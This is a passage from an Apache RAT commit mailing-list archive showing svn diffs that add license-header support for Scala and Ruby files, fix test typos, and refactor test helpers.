incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1080664&r1=1080663&r2=1080664&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 11 16:54:36 2011 @@ -32,7 +32,7 @@ public class TestLicenceAppender extends private Random random = new Random(); public void testAddLicenceToUnknownFile() throws IOException { - String filename = "tmp" + random.nextLong() + ".unkownTyoe"; + String filename = "tmp" + random.nextLong() + ".unkownType"; File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); FileWriter writer = new FileWriter(file); writer.write("Unkown file type\n"); From [email protected] Fri Mar 11 17:00:33 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23629 invoked from network); 11 Mar 2011 17:00:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 17:00:33 -0000 Received: (qmail 63726 invoked by uid 500); 11 Mar 2011 17:00:33 -0000 Delivered-To: [email protected] Received: (qmail 63704 invoked by uid 500); 11 Mar 2011 17:00:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63697 invoked by uid 99); 11 Mar 2011 17:00:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:00:33 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:00:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 32C9D23889EB; Fri, 11 Mar 2011 17:00:10 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080669 - in /incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks: Report.java ResourceCollectionContainer.java Date: Fri, 11 Mar 2011 17:00:10 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 17:00:09 2011 New Revision: 1080669 URL: http://svn.apache.org/viewvc?rev=1080669&view=rev Log: javadocs are out of date Modified: incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/Report.java incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/ResourceCollectionContainer.java Modified: incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/Report.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/Report.java?rev=1080669&r1=1080668&r2=1080669&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/Report.java (original) +++ incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/Report.java Fri Mar 11 17:00:09 2011 @@ -49,7 +49,7 @@ import org.apache.rat.license.ILicenseFa * A basic Ant task that generates a report on all files specified by * the nested resource collection(s). * - * <p>ILicenseMatcher(s) can be specified as nested elements as well.</p> + * <p>IHeaderMatcher(s) can be specified as nested elements as well.</p> * * <p>The attribute <code>format</code> defines the output format and * can take the values Modified: incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/ResourceCollectionContainer.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/ResourceCollectionContainer.java?rev=1080669&r1=1080668&r2=1080669&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/ResourceCollectionContainer.java (original) +++ incubator/rat/main/trunk/apache-rat-tasks/src/main/java/org/apache/rat/anttasks/ResourceCollectionContainer.java Fri Mar 11 17:00:09 2011 @@ -36,7 +36,7 @@ import org.apache.tools.ant.types.Resour import org.apache.tools.ant.types.resources.FileResource; /** - * Implementation of IElement that traverses over a resource + * Implementation of IReportable that traverses over a resource * collection internally. */ class ResourceCollectionContainer implements IReportable { From [email protected] Fri Mar 11 17:09:22 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75238 invoked from network); 11 Mar 2011 17:09:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 17:09:22 -0000 Received: (qmail 78411 invoked by uid 500); 11 Mar 2011 17:09:22 -0000 Delivered-To: [email protected] Received: (qmail 78384 invoked by uid 500); 11 Mar 2011 17:09:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78377 invoked by uid 99); 11 Mar 2011 17:09:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:09:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:09:21 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 663732388A66; Fri, 11 Mar 2011 17:08:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080674 - in /incubator/rat/main/trunk: RELEASE_NOTES.txt apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 11 Mar 2011 17:08:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 17:08:59 2011 New Revision: 1080674 URL: http://svn.apache.org/viewvc?rev=1080674&view=rev Log: support Scala when adding licenses. RAT-83 Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/RELEASE_NOTES.txt?rev=1080674&r1=1080673&r2=1080674&view=diff ============================================================================== --- incubator/rat/main/trunk/RELEASE_NOTES.txt (original) +++ incubator/rat/main/trunk/RELEASE_NOTES.txt Fri Mar 11 17:08:59 2011 @@ -7,6 +7,8 @@ RAT 0.8 * Improvement: * RAT-79 Support automatic addition of license headers to Velocity templates + * RAT-83 Support automatic addition of license headers to Scala + source files RAT 0.7 ======= Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java?rev=1080674&r1=1080673&r2=1080674&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java Fri Mar 11 17:08:59 2011 @@ -46,6 +46,8 @@ public abstract class AbstractLicenceApp private static final int TYPE_SH = 11; private static final int TYPE_BAT = 12; private static final int TYPE_VM = 13; + private static final int TYPE_SCALA = 14; + private boolean isForced; public AbstractLicenceAppender() { @@ -77,7 +79,8 @@ public abstract class AbstractLicenceApp || type == TYPE_C || type == TYPE_H || type == TYPE_HTML - || type == TYPE_VM) { + || type == TYPE_VM + || type == TYPE_SCALA) { writer.write(getLicenceHeader(document)); writer.write('\n'); } @@ -169,6 +172,8 @@ public abstract class AbstractLicenceApp return TYPE_BAT; } else if (document.getPath().endsWith(".vm")) { return TYPE_VM; + } else if (document.getPath().endsWith(".scala")) { + return TYPE_SCALA; } return TYPE_UNKNOWN; } @@ -210,6 +215,7 @@ public abstract class AbstractLicenceApp case TYPE_PYTHON: return "#\n"; case TYPE_SH: return "#\n"; case TYPE_BAT: return "rem\n"; + case TYPE_SCALA: return "/*\n"; default: return ""; } } @@ -236,6 +242,7 @@ public abstract class AbstractLicenceApp case TYPE_PYTHON: return "#\n"; case TYPE_SH: return "#\n"; case TYPE_BAT: return "rem\n"; + case TYPE_SCALA: return " */\n"; default: return ""; } } @@ -267,6 +274,7 @@ public abstract class AbstractLicenceApp case TYPE_SH: return "#" + content + "\n"; case TYPE_BAT: return "rem" + content + "\n"; case TYPE_VM: return "##" + content + "\n"; + case TYPE_SCALA: return " *" + content + "\n"; default: return ""; } } Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1080674&r1=1080673&r2=1080674&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 11 17:08:59 2011 @@ -218,4 +218,37 @@ public class TestLicenceAppender extends file.delete(); newFile.delete(); } + + public void testAddLicenceToScala() throws IOException { + String filename = "tmp.scala"; + String firstLine = "package foo {"; + String newFirstLine = "/*"; + + File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); + FileWriter writer = new FileWriter(file); + writer.write(firstLine + "\n"); + writer.write("\n"); + writer.write(" object X { val x = 1; }\n"); + writer.write("}\n"); + writer.close(); + + ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); + appender.append(file); + + File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); + BufferedReader reader = new BufferedReader(new FileReader(newFile)); + String line = reader.readLine(); + assertEquals("First line is incorrect", newFirstLine, line); + while ((line = reader.readLine()) != null) { + if (line.length() == 0) { + line = reader.readLine(); + break; + } + } + assertEquals("Package line is incorrect", firstLine, line); + + file.delete(); + newFile.delete(); + } + } From [email protected] Fri Mar 11 17:21:15 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3610 invoked from network); 11 Mar 2011 17:21:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 17:21:15 -0000 Received: (qmail 87536 invoked by uid 500); 11 Mar 2011 17:21:15 -0000 Delivered-To: [email protected] Received: (qmail 87510 invoked by uid 500); 11 Mar 2011 17:21:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87503 invoked by uid 99); 11 Mar 2011 17:21:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:21:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 17:21:14 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D0D1623888CB; Fri, 11 Mar 2011 17:20:51 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080680 - in /incubator/rat/main/trunk: RELEASE_NOTES.txt apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 11 Mar 2011 17:20:51 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 17:20:51 2011 New Revision: 1080680 URL: http://svn.apache.org/viewvc?rev=1080680&view=rev Log: support Ruby when adding licenses. RAT-84 Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/RELEASE_NOTES.txt?rev=1080680&r1=1080679&r2=1080680&view=diff ============================================================================== --- incubator/rat/main/trunk/RELEASE_NOTES.txt (original) +++ incubator/rat/main/trunk/RELEASE_NOTES.txt Fri Mar 11 17:20:51 2011 @@ -9,6 +9,8 @@ RAT 0.8 templates * RAT-83 Support automatic addition of license headers to Scala source files + * RAT-84 Support automatic addition of license headers to Ruby + source files RAT 0.7 ======= Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java?rev=1080680&r1=1080679&r2=1080680&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/annotation/AbstractLicenceAppender.java Fri Mar 11 17:20:51 2011 @@ -47,6 +47,7 @@ public abstract class AbstractLicenceApp private static final int TYPE_BAT = 12; private static final int TYPE_VM = 13; private static final int TYPE_SCALA = 14; + private static final int TYPE_RUBY = 15; private boolean isForced; @@ -88,7 +89,7 @@ public abstract class AbstractLicenceApp String line; boolean first = true; while ((line = br.readLine()) != null) { - if (first && type == TYPE_PYTHON) { + if (first && (type == TYPE_PYTHON || type == TYPE_RUBY)) { doFirstLine(document, writer, line, "#!/usr/bin"); } else if (first && type == TYPE_BAT) { doFirstLine(document, writer, line, "@echo off"); @@ -174,6 +175,8 @@ public abstract class AbstractLicenceApp return TYPE_VM; } else if (document.getPath().endsWith(".scala")) { return TYPE_SCALA; + } else if (document.getPath().endsWith(".rb")) { + return TYPE_RUBY; } return TYPE_UNKNOWN; } @@ -216,6 +219,7 @@ public abstract class AbstractLicenceApp case TYPE_SH: return "#\n"; case TYPE_BAT: return "rem\n"; case TYPE_SCALA: return "/*\n"; + case TYPE_RUBY: return "#\n"; default: return ""; } } @@ -243,6 +247,7 @@ public abstract class AbstractLicenceApp case TYPE_SH: return "#\n"; case TYPE_BAT: return "rem\n"; case TYPE_SCALA: return " */\n"; + case TYPE_RUBY: return "#\n"; default: return ""; } } @@ -275,6 +280,7 @@ public abstract class AbstractLicenceApp case TYPE_BAT: return "rem" + content + "\n"; case TYPE_VM: return "##" + content + "\n"; case TYPE_SCALA: return " *" + content + "\n"; + case TYPE_RUBY: return "#" + content + "\n"; default: return ""; } } Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1080680&r1=1080679&r2=1080680&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 11 17:20:51 2011 @@ -251,4 +251,53 @@ public class TestLicenceAppender extends newFile.delete(); } + public void testAddLicenseToRubyWithoutHashBang() throws IOException { + String filename = "tmp.rb"; + String firstLine = "#"; + + File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); + FileWriter writer = new FileWriter(file); + writer.write("class Foo\n"); + writer.write("end\n"); + writer.close(); + + ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); + appender.append(file); + + File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); + + BufferedReader reader = new BufferedReader(new FileReader(newFile)); + String line = reader.readLine(); + assertEquals("First line is incorrect", firstLine, line); + + file.delete(); + newFile.delete(); + } + + public void testAddLicenseToRubyWithHashBang() throws IOException { + String filename = "tmp.rb"; + String firstLine = "#!/usr/bin/env ruby"; + String secondLine = "#"; + + File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); + FileWriter writer = new FileWriter(file); + writer.write(firstLine + "\n"); + writer.write("class Foo\n"); + writer.write("end\n"); + writer.close(); + + ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); + appender.append(file); + + File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); + + BufferedReader reader = new BufferedReader(new FileReader(newFile)); + String line = reader.readLine(); + assertEquals("First line is incorrect", firstLine, line); + line = reader.readLine(); + assertEquals("Second line is incorrect", secondLine, line); + + file.delete(); + newFile.delete(); + } } From [email protected] Mon Mar 14 09:12:52 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99206 invoked from network); 14 Mar 2011 09:12:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Mar 2011 09:12:51 -0000 Received: (qmail 32902 invoked by uid 500); 14 Mar 2011 09:12:51 -0000 Delivered-To: [email protected] Received: (qmail 32866 invoked by uid 500); 14 Mar 2011 09:12:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32859 invoked by uid 99); 14 Mar 2011 09:12:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Mar 2011 09:12:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Mar 2011 09:12:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 03D3823888E7; Mon, 14 Mar 2011 09:12:26 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1081292 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Mon, 14 Mar 2011 09:12:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Mar 14 09:12:25 2011 New Revision: 1081292 URL: http://svn.apache.org/viewvc?rev=1081292&view=rev Log: there was more than one typo in the extension, thanks Gav Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1081292&r1=1081291&r2=1081292&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Mon Mar 14 09:12:25 2011 @@ -32,7 +32,7 @@ public class TestLicenceAppender extends private Random random = new Random(); public void testAddLicenceToUnknownFile() throws IOException { - String filename = "tmp" + random.nextLong() + ".unkownType"; + String filename = "tmp" + random.nextLong() + ".unknownType"; File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); FileWriter writer = new FileWriter(file); writer.write("Unkown file type\n"); From [email protected] Mon Mar 14 16:17:07 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78518 invoked from network); 14 Mar 2011 16:17:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Mar 2011 16:17:07 -0000 Received: (qmail 17386 invoked by uid 500); 14 Mar 2011 16:17:07 -0000 Delivered-To: [email protected] Received: (qmail 17361 invoked by uid 500); 14 Mar 2011 16:17:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17354 invoked by uid 99); 14 Mar 2011 16:17:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Mar 2011 16:17:06 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 Mar 2011 16:17:06 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DE28D23888C2; Mon, 14 Mar 2011 16:16:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1081440 - /incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Date: Mon, 14 Mar 2011 16:16:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Mon Mar 14 16:16:43 2011 New Revision: 1081440 URL: http://svn.apache.org/viewvc?rev=1081440&view=rev Log: make sure configuration knows a header matcher. RAT-86 Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Modified: incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java?rev=1081440&r1=1081439&r2=1081440&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/main/java/org/apache/rat/Report.java Mon Mar 14 16:16:43 2011 @@ -60,6 +60,7 @@ public class Report { //@SuppressWarnings("unchecked") public static final void main(String args[]) throws Exception { final ReportConfiguration configuration = new ReportConfiguration(); + configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); Options opts = buildOptions(); PosixParser parser = new PosixParser(); @@ -107,7 +108,6 @@ public class Report { System.exit(1); } try { - configuration.setHeaderMatcher(Defaults.createDefaultMatcher()); report(System.out, report.getDirectory(System.out), new FileInputStream(style[0]), @@ -266,7 +266,7 @@ public class Report { } try { - return new ArchiveWalker(base, inputFileFilter); + return new ArchiveWalker(base, inputFileFilter); } catch (IOException ex) { out.print("ERROR: "); out.print(baseDirectory); From [email protected] Fri Mar 18 17:11:23 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40250 invoked from network); 18 Mar 2011 17:11:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:11:23 -0000 Received: (qmail 65151 invoked by uid 500); 18 Mar 2011 17:11:23 -0000 Delivered-To: [email protected] Received: (qmail 65120 invoked by uid 500); 18 Mar 2011 17:11:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65113 invoked by uid 99); 18 Mar 2011 17:11:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:11:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:11:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 85EE823888EA; Fri, 18 Mar 2011 17:10:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082974 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:10:56 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Mar 18 17:10:56 2011 New Revision: 1082974 URL: http://svn.apache.org/viewvc?rev=1082974&view=rev Log: a bunch of template methods that will be used by the tests but are currently unused. RAT-87 Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082974&r1=1082973&r2=1082974&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:10:56 2011 @@ -23,6 +23,7 @@ import java.io.File; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; +import java.io.Writer; import java.util.Random; import junit.framework.TestCase; @@ -31,6 +32,82 @@ public class TestLicenceAppender extends /** Used to ensure that temporary files have unq */ private Random random = new Random(); + private interface FileCreator { + void createFile(Writer w) throws IOException; + } + + private interface NewFileReader { + void readFile(BufferedReader r) throws IOException; + } + + private static String qualify(String fileName) { + return new File(new File(System.getProperty("java.io.tmpdir")), + fileName) + .getAbsolutePath(); + } + + private static void createTestFile(String fileName, + FileCreator creator) + throws IOException { + FileWriter w = null; + try { + creator.createFile(w = new FileWriter(fileName)); + } finally { + if (w != null) { + w.close(); + } + } + } + + private static void commonTestTemplate(String relativeName, + FileCreator creator, + NewFileReader reader) + throws IOException { + String name = qualify(relativeName); + try { + createTestFile(name, creator); + + ApacheV2LicenceAppender appender = + new ApacheV2LicenceAppender(); + appender.append(new File(name)); + + BufferedReader r = null; + try { + r = new BufferedReader(new FileReader(name + ".new")); + reader.readFile(r); + } finally { + if (r != null) { + r.close(); + } + } + } finally { + File f = new File(name); + if (f.exists() && !f.delete()) { + f.deleteOnExit(); + } + f = new File(name + ".new"); + if (f.exists() && !f.delete()) { + f.deleteOnExit(); + } + } + } + + private static NewFileReader checkLines(final String firstLine, + final String secondLine) { + return new NewFileReader() { + public void readFile(BufferedReader r) throws IOException { + String line = r.readLine(); + assertEquals("First line is incorrect", + firstLine, line); + if (secondLine != null) { + line = r.readLine(); + assertEquals("Second line is incorrect", + secondLine, line); + } + } + }; + } + public void testAddLicenceToUnknownFile() throws IOException { String filename = "tmp" + random.nextLong() + ".unknownType"; File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); From [email protected] Fri Mar 18 17:19:34 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58302 invoked from network); 18 Mar 2011 17:19:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:19:34 -0000 Received: (qmail 75686 invoked by uid 500); 18 Mar 2011 17:19:34 -0000 Delivered-To: [email protected] Received: (qmail 75659 invoked by uid 500); 18 Mar 2011 17:19:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75651 invoked by uid 99); 18 Mar 2011 17:19:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:19:34 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 